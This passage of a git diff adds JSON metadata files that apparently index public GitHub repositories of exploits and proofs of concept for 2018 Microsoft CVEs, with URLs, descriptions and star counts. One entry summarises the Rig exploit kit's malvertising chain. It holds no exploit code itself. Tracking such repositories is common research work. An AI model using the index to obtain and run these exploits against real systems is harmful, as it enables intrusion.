"login": "0x09AL", + "id": 25826294, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25826294?v=4", + "html_url": "https:\/\/github.com\/0x09AL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x09AL\/CVE-2018-8174-msf", + "description": "CVE-2018-8174 - VBScript memory corruption exploit.", + "fork": false, + "created_at": "2018-05-22T21:50:32Z", + "updated_at": "2024-09-13T15:40:47Z", + "pushed_at": "2018-05-23T20:43:58Z", + "stargazers_count": 167, + "watchers_count": 167, + "has_discussions": false, + "forks_count": 69, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 69, + "watchers": 167, + "score": 0, + "subscribers_count": 14 + }, + { + "id": 135381512, + "name": "CVE-2018-8174_EXP", + "full_name": "Yt1g3r\/CVE-2018-8174_EXP", + "owner": { + "login": "Yt1g3r", + "id": 12625147, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12625147?v=4", + "html_url": "https:\/\/github.com\/Yt1g3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yt1g3r\/CVE-2018-8174_EXP", + "description": "CVE-2018-8174_python", + "fork": false, + "created_at": "2018-05-30T03:12:32Z", + "updated_at": "2024-11-12T07:16:33Z", + "pushed_at": "2022-04-19T13:24:53Z", + "stargazers_count": 139, + "watchers_count": 139, + "has_discussions": false, + "forks_count": 70, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 70, + "watchers": 139, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 135767741, + "name": "CVE-2018-8174", + "full_name": "SyFi\/CVE-2018-8174", + "owner": { + "login": "SyFi", + "id": 26314806, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26314806?v=4", + "html_url": "https:\/\/github.com\/SyFi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SyFi\/CVE-2018-8174", + "description": "MS Word MS WordPad via IE VBS Engine RCE ", + "fork": false, + "created_at": "2018-06-01T22:12:54Z", + "updated_at": "2024-08-29T01:22:24Z", + "pushed_at": "2018-06-01T22:18:59Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 7, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 138712476, + "name": "Rig-Exploit-for-CVE-2018-8174", + "full_name": "orf53975\/Rig-Exploit-for-CVE-2018-8174", + "owner": { + "login": "orf53975", + "id": 25189997, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25189997?v=4", + "html_url": "https:\/\/github.com\/orf53975", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/orf53975\/Rig-Exploit-for-CVE-2018-8174", + "description": "Rig Exploit for CVE-2018-8174 As with its previous campaigns, Rig’s Seamless campaign uses malvertising. In this case, the malvertisements have a hidden iframe that redirects victims to Rig’s landing page, which includes an exploit for CVE-2018-8174 and shellcode. This enables remote code execution of the shellcode obfuscated in the landing page. After successful exploitation, a second-stage downloader is retrieved, which appears to be a variant of SmokeLoader due to the URL. It would then download the final payload, a Monero miner.", + "fork": false, + "created_at": "2018-06-26T09:03:45Z", + "updated_at": "2023-11-25T06:09:26Z", + "pushed_at": "2018-06-08T14:33:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 140478620, + "name": "cve-2018-8174_analysis", + "full_name": "piotrflorczyk\/cve-2018-8174_analysis", + "owner": { + "login": "piotrflorczyk", + "id": 7830144, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7830144?v=4", + "html_url": "https:\/\/github.com\/piotrflorczyk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/piotrflorczyk\/cve-2018-8174_analysis", + "description": "Analysis of VBS exploit CVE-2018-8174", + "fork": false, + "created_at": "2018-07-10T19:31:25Z", + "updated_at": "2024-08-29T01:22:24Z", + "pushed_at": "2018-07-12T08:35:13Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 30, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 147615569, + "name": "CVE-2018-8174-msf", + "full_name": "likekabin\/CVE-2018-8174-msf", + "owner": { + "login": "likekabin", + "id": 2469038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2469038?v=4", + "html_url": "https:\/\/github.com\/likekabin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likekabin\/CVE-2018-8174-msf", + "description": null, + "fork": false, + "created_at": "2018-09-06T04:03:25Z", + "updated_at": "2018-09-06T04:03:37Z", + "pushed_at": "2018-09-06T04:03:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 188212551, + "name": "ie11_vbscript_exploit", + "full_name": "ruthlezs\/ie11_vbscript_exploit", + "owner": { + "login": "ruthlezs", + "id": 15887791, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15887791?v=4", + "html_url": "https:\/\/github.com\/ruthlezs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ruthlezs\/ie11_vbscript_exploit", + "description": "Exploit Generator for CVE-2018-8174 & CVE-2019-0768 (RCE via VBScript Execution in IE11)", + "fork": false, + "created_at": "2019-05-23T10:28:40Z", + "updated_at": "2024-08-12T19:49:13Z", + "pushed_at": "2019-05-23T11:26:38Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 283930515, + "name": "CVE-2018-8174_EXP", + "full_name": "ericisnotrealname\/CVE-2018-8174_EXP", + "owner": { + "login": "ericisnotrealname", + "id": 69024235, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69024235?v=4", + "html_url": "https:\/\/github.com\/ericisnotrealname", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ericisnotrealname\/CVE-2018-8174_EXP", + "description": null, + "fork": false, + "created_at": "2020-07-31T03:13:43Z", + "updated_at": "2020-07-31T03:13:56Z", + "pushed_at": "2020-07-31T03:13:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 315552519, + "name": "https-github.com-iBearcat-CVE-2018-8174_EXP", + "full_name": "www201001\/https-github.com-iBearcat-CVE-2018-8174_EXP", + "owner": { + "login": "www201001", + "id": 74952557, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74952557?v=4", + "html_url": "https:\/\/github.com\/www201001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/www201001\/https-github.com-iBearcat-CVE-2018-8174_EXP", + "description": null, + "fork": false, + "created_at": "2020-11-24T07:31:07Z", + "updated_at": "2020-11-24T07:31:07Z", + "pushed_at": "2020-11-24T07:31:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 315552850, + "name": "https-github.com-iBearcat-CVE-2018-8174_EXP.git-", + "full_name": "www201001\/https-github.com-iBearcat-CVE-2018-8174_EXP.git-", + "owner": { + "login": "www201001", + "id": 74952557, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74952557?v=4", + "html_url": "https:\/\/github.com\/www201001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/www201001\/https-github.com-iBearcat-CVE-2018-8174_EXP.git-", + "description": null, + "fork": false, + "created_at": "2020-11-24T07:32:39Z", + "updated_at": "2023-11-23T02:47:54Z", + "pushed_at": "2020-11-24T07:32:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 354695019, + "name": "CVE-2018-8174", + "full_name": "delina1\/CVE-2018-8174", + "owner": { + "login": "delina1", + "id": 81941054, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81941054?v=4", + "html_url": "https:\/\/github.com\/delina1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/delina1\/CVE-2018-8174", + "description": null, + "fork": false, + "created_at": "2021-04-05T02:27:49Z", + "updated_at": "2021-04-05T02:27:49Z", + "pushed_at": "2021-04-05T02:27:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 354695794, + "name": "CVE-2018-8174_EXP", + "full_name": "delina1\/CVE-2018-8174_EXP", + "owner": { + "login": "delina1", + "id": 81941054, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81941054?v=4", + "html_url": "https:\/\/github.com\/delina1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/delina1\/CVE-2018-8174_EXP", + "description": null, + "fork": false, + "created_at": "2021-04-05T02:31:54Z", + "updated_at": "2021-04-05T02:31:54Z", + "pushed_at": "2021-04-05T02:31:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 370609005, + "name": "CVE-2018-8174_EXP", + "full_name": "DarkFlameMaster-bit\/CVE-2018-8174_EXP", + "owner": { + "login": "DarkFlameMaster-bit", + "id": 84758348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84758348?v=4", + "html_url": "https:\/\/github.com\/DarkFlameMaster-bit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DarkFlameMaster-bit\/CVE-2018-8174_EXP", + "description": null, + "fork": false, + "created_at": "2021-05-25T07:48:30Z", + "updated_at": "2021-05-25T07:48:30Z", + "pushed_at": "2021-05-25T07:48:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 431720524, + "name": "CVE-2018-8174-exp", + "full_name": "lisinan988\/CVE-2018-8174-exp", + "owner": { + "login": "lisinan988", + "id": 87479262, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87479262?v=4", + "html_url": "https:\/\/github.com\/lisinan988", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lisinan988\/CVE-2018-8174-exp", + "description": null, + "fork": false, + "created_at": "2021-11-25T05:06:25Z", + "updated_at": "2021-11-25T05:15:38Z", + "pushed_at": "2022-04-21T13:50:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 434589002, + "name": "https-github.com-iBearcat-CVE-2018-8174_EXP", + "full_name": "sinisterghost\/https-github.com-iBearcat-CVE-2018-8174_EXP", + "owner": { + "login": "sinisterghost", + "id": 92614950, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92614950?v=4", + "html_url": "https:\/\/github.com\/sinisterghost", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinisterghost\/https-github.com-iBearcat-CVE-2018-8174_EXP", + "description": null, + "fork": false, + "created_at": "2021-12-03T12:30:07Z", + "updated_at": "2021-12-03T12:30:07Z", + "pushed_at": "2021-12-03T12:30:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8208.json b/2018/CVE-2018-8208.json new file mode 100644 index 0000000000..9575306644 --- /dev/null +++ b/2018/CVE-2018-8208.json @@ -0,0 +1,33 @@ +[ + { + "id": 144541015, + "name": "CVE-2018-8208", + "full_name": "kaisaryousuf\/CVE-2018-8208", + "owner": { + "login": "kaisaryousuf", + "id": 27071719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27071719?v=4", + "html_url": "https:\/\/github.com\/kaisaryousuf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kaisaryousuf\/CVE-2018-8208", + "description": null, + "fork": false, + "created_at": "2018-08-13T06:56:11Z", + "updated_at": "2018-11-12T16:22:38Z", + "pushed_at": "2018-06-21T15:06:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8214.json b/2018/CVE-2018-8214.json new file mode 100644 index 0000000000..758cc65d5d --- /dev/null +++ b/2018/CVE-2018-8214.json @@ -0,0 +1,33 @@ +[ + { + "id": 138600643, + "name": "CVE-2018-8214", + "full_name": "guwudoor\/CVE-2018-8214", + "owner": { + "login": "guwudoor", + "id": 40532741, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40532741?v=4", + "html_url": "https:\/\/github.com\/guwudoor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guwudoor\/CVE-2018-8214", + "description": null, + "fork": false, + "created_at": "2018-06-25T13:43:58Z", + "updated_at": "2023-11-18T03:10:30Z", + "pushed_at": "2018-06-21T15:24:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8284.json b/2018/CVE-2018-8284.json new file mode 100644 index 0000000000..24e2723f7a --- /dev/null +++ b/2018/CVE-2018-8284.json @@ -0,0 +1,33 @@ +[ + { + "id": 180750768, + "name": "CVE-2018-8284-Sharepoint-RCE", + "full_name": "quantiti\/CVE-2018-8284-Sharepoint-RCE", + "owner": { + "login": "quantiti", + "id": 23648688, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23648688?v=4", + "html_url": "https:\/\/github.com\/quantiti", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/quantiti\/CVE-2018-8284-Sharepoint-RCE", + "description": null, + "fork": false, + "created_at": "2019-04-11T08:41:41Z", + "updated_at": "2020-08-21T05:27:05Z", + "pushed_at": "2019-04-11T08:44:04Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8353.json b/2018/CVE-2018-8353.json new file mode 100644 index 0000000000..da576433f2 --- /dev/null +++ b/2018/CVE-2018-8353.json @@ -0,0 +1,33 @@ +[ + { + "id": 148192905, + "name": "CVE-2018-8353-POC", + "full_name": "whereisr0da\/CVE-2018-8353-POC", + "owner": { + "login": "whereisr0da", + "id": 37551872, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37551872?v=4", + "html_url": "https:\/\/github.com\/whereisr0da", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whereisr0da\/CVE-2018-8353-POC", + "description": "Simple poc of CVE-2018-8353 Microsoft Scripting Engine Use After Free", + "fork": false, + "created_at": "2018-09-10T17:28:05Z", + "updated_at": "2018-10-15T01:07:56Z", + "pushed_at": "2018-09-10T17:32:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8389.json b/2018/CVE-2018-8389.json new file mode 100644 index 0000000000..007dbb9039 --- /dev/null +++ b/2018/CVE-2018-8389.json @@ -0,0 +1,33 @@ +[ + { + "id": 215231004, + "name": "cve-2018-8389", + "full_name": "sharmasandeepkr\/cve-2018-8389", + "owner": { + "login": "sharmasandeepkr", + "id": 16163884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16163884?v=4", + "html_url": "https:\/\/github.com\/sharmasandeepkr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sharmasandeepkr\/cve-2018-8389", + "description": null, + "fork": false, + "created_at": "2019-10-15T07:09:02Z", + "updated_at": "2019-10-15T07:09:49Z", + "pushed_at": "2019-10-15T07:09:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8410.json b/2018/CVE-2018-8410.json new file mode 100644 index 0000000000..b9d2703755 --- /dev/null +++ b/2018/CVE-2018-8410.json @@ -0,0 +1,33 @@ +[ + { + "id": 409937919, + "name": "CVE-2018-8410", + "full_name": "trapmine\/CVE-2018-8410", + "owner": { + "login": "trapmine", + "id": 16519429, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16519429?v=4", + "html_url": "https:\/\/github.com\/trapmine", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trapmine\/CVE-2018-8410", + "description": "Windows Kernel Registry Elevation of Privilege Vulnerability", + "fork": false, + "created_at": "2021-09-24T11:24:31Z", + "updated_at": "2023-09-07T00:37:07Z", + "pushed_at": "2021-09-24T11:26:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8414.json b/2018/CVE-2018-8414.json new file mode 100644 index 0000000000..a8210c750f --- /dev/null +++ b/2018/CVE-2018-8414.json @@ -0,0 +1,33 @@ +[ + { + "id": 146024644, + "name": "CVE-2018-8414-POC", + "full_name": "whereisr0da\/CVE-2018-8414-POC", + "owner": { + "login": "whereisr0da", + "id": 37551872, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37551872?v=4", + "html_url": "https:\/\/github.com\/whereisr0da", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whereisr0da\/CVE-2018-8414-POC", + "description": "Simple poc of CVE-2018-8414 Windows Package Setting RCE Vulnerability", + "fork": false, + "created_at": "2018-08-24T18:09:29Z", + "updated_at": "2023-07-25T15:28:06Z", + "pushed_at": "2020-09-21T15:58:40Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8420.json b/2018/CVE-2018-8420.json new file mode 100644 index 0000000000..1b9f3ff778 --- /dev/null +++ b/2018/CVE-2018-8420.json @@ -0,0 +1,33 @@ +[ + { + "id": 148446677, + "name": "CVE-2018-8420", + "full_name": "idkwim\/CVE-2018-8420", + "owner": { + "login": "idkwim", + "id": 4337087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4337087?v=4", + "html_url": "https:\/\/github.com\/idkwim", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/idkwim\/CVE-2018-8420", + "description": null, + "fork": false, + "created_at": "2018-09-12T08:22:54Z", + "updated_at": "2024-08-12T19:41:36Z", + "pushed_at": "2018-09-12T03:50:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 45, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 45, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8440.json b/2018/CVE-2018-8440.json new file mode 100644 index 0000000000..4ca23e1286 --- /dev/null +++ b/2018/CVE-2018-8440.json @@ -0,0 +1,33 @@ +[ + { + "id": 155593957, + "name": "CVE-2018-8440", + "full_name": "sourceincite\/CVE-2018-8440", + "owner": { + "login": "sourceincite", + "id": 13770985, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13770985?v=4", + "html_url": "https:\/\/github.com\/sourceincite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sourceincite\/CVE-2018-8440", + "description": "CVE-2018-8440 standalone exploit", + "fork": false, + "created_at": "2018-10-31T17:00:43Z", + "updated_at": "2024-08-12T19:42:54Z", + "pushed_at": "2018-10-31T19:05:17Z", + "stargazers_count": 79, + "watchers_count": 79, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 79, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8453.json b/2018/CVE-2018-8453.json new file mode 100644 index 0000000000..c929b3c9a8 --- /dev/null +++ b/2018/CVE-2018-8453.json @@ -0,0 +1,95 @@ +[ + { + "id": 166348798, + "name": "cve-2018-8453-exp", + "full_name": "Mkv4\/cve-2018-8453-exp", + "owner": { + "login": "Mkv4", + "id": 28436576, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28436576?v=4", + "html_url": "https:\/\/github.com\/Mkv4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mkv4\/cve-2018-8453-exp", + "description": "cve-2018-8453 exp", + "fork": false, + "created_at": "2019-01-18T05:24:22Z", + "updated_at": "2024-02-26T17:40:16Z", + "pushed_at": "2019-01-18T05:23:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 166389170, + "name": "cve-2018-8453-exp", + "full_name": "ze0r\/cve-2018-8453-exp", + "owner": { + "login": "ze0r", + "id": 43227253, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43227253?v=4", + "html_url": "https:\/\/github.com\/ze0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ze0r\/cve-2018-8453-exp", + "description": "cve-2018-8453 exp", + "fork": false, + "created_at": "2019-01-18T10:40:03Z", + "updated_at": "2024-08-12T19:44:57Z", + "pushed_at": "2019-12-13T02:24:39Z", + "stargazers_count": 120, + "watchers_count": 120, + "has_discussions": false, + "forks_count": 53, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 53, + "watchers": 120, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 195813761, + "name": "leHACK-Analysis-of-CVE-2018-8453", + "full_name": "thepwnrip\/leHACK-Analysis-of-CVE-2018-8453", + "owner": { + "login": "thepwnrip", + "id": 25064984, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25064984?v=4", + "html_url": "https:\/\/github.com\/thepwnrip", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thepwnrip\/leHACK-Analysis-of-CVE-2018-8453", + "description": null, + "fork": false, + "created_at": "2019-07-08T13:06:10Z", + "updated_at": "2024-06-11T14:50:02Z", + "pushed_at": "2019-07-08T13:15:07Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8495.json b/2018/CVE-2018-8495.json new file mode 100644 index 0000000000..453ea2624d --- /dev/null +++ b/2018/CVE-2018-8495.json @@ -0,0 +1,33 @@ +[ + { + "id": 152781400, + "name": "CVE-2018-8495-POC", + "full_name": "whereisr0da\/CVE-2018-8495-POC", + "owner": { + "login": "whereisr0da", + "id": 37551872, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37551872?v=4", + "html_url": "https:\/\/github.com\/whereisr0da", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whereisr0da\/CVE-2018-8495-POC", + "description": "Simple poc of CVE-2018-8495 Microsoft Edge Remote Code Execution", + "fork": false, + "created_at": "2018-10-12T16:49:57Z", + "updated_at": "2023-03-02T10:01:20Z", + "pushed_at": "2018-10-12T16:52:34Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8581.json b/2018/CVE-2018-8581.json new file mode 100644 index 0000000000..154836c10f --- /dev/null +++ b/2018/CVE-2018-8581.json @@ -0,0 +1,95 @@ +[ + { + "id": 163256409, + "name": "CVE-2018-8581", + "full_name": "WyAtu\/CVE-2018-8581", + "owner": { + "login": "WyAtu", + "id": 23521935, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23521935?v=4", + "html_url": "https:\/\/github.com\/WyAtu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WyAtu\/CVE-2018-8581", + "description": "CVE-2018-8581 | Microsoft Exchange Server Elevation of Privilege Vulnerability", + "fork": false, + "created_at": "2018-12-27T06:30:32Z", + "updated_at": "2024-09-19T11:51:58Z", + "pushed_at": "2018-12-30T11:53:08Z", + "stargazers_count": 331, + "watchers_count": 331, + "has_discussions": false, + "forks_count": 107, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 107, + "watchers": 331, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 163425981, + "name": "CVE-2018-8581", + "full_name": "qiantu88\/CVE-2018-8581", + "owner": { + "login": "qiantu88", + "id": 35452263, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35452263?v=4", + "html_url": "https:\/\/github.com\/qiantu88", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qiantu88\/CVE-2018-8581", + "description": "CVE-2018-8581", + "fork": false, + "created_at": "2018-12-28T15:47:32Z", + "updated_at": "2019-02-07T04:37:49Z", + "pushed_at": "2018-12-28T15:47:53Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 167313064, + "name": "Exchange2domain", + "full_name": "Ridter\/Exchange2domain", + "owner": { + "login": "Ridter", + "id": 6007471, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6007471?v=4", + "html_url": "https:\/\/github.com\/Ridter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ridter\/Exchange2domain", + "description": "CVE-2018-8581", + "fork": false, + "created_at": "2019-01-24T06:08:23Z", + "updated_at": "2024-10-14T09:09:40Z", + "pushed_at": "2022-10-21T08:29:33Z", + "stargazers_count": 370, + "watchers_count": 370, + "has_discussions": false, + "forks_count": 78, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 78, + "watchers": 370, + "score": 0, + "subscribers_count": 10 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8587.json b/2018/CVE-2018-8587.json new file mode 100644 index 0000000000..ff4d4d5fc3 --- /dev/null +++ b/2018/CVE-2018-8587.json @@ -0,0 +1,33 @@ +[ + { + "id": 548750327, + "name": "CVE-2018-8587-reproduction", + "full_name": "Sunqiz\/CVE-2018-8587-reproduction", + "owner": { + "login": "Sunqiz", + "id": 59192636, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59192636?v=4", + "html_url": "https:\/\/github.com\/Sunqiz", + "user_view_type": "public" + }, + "html_url": 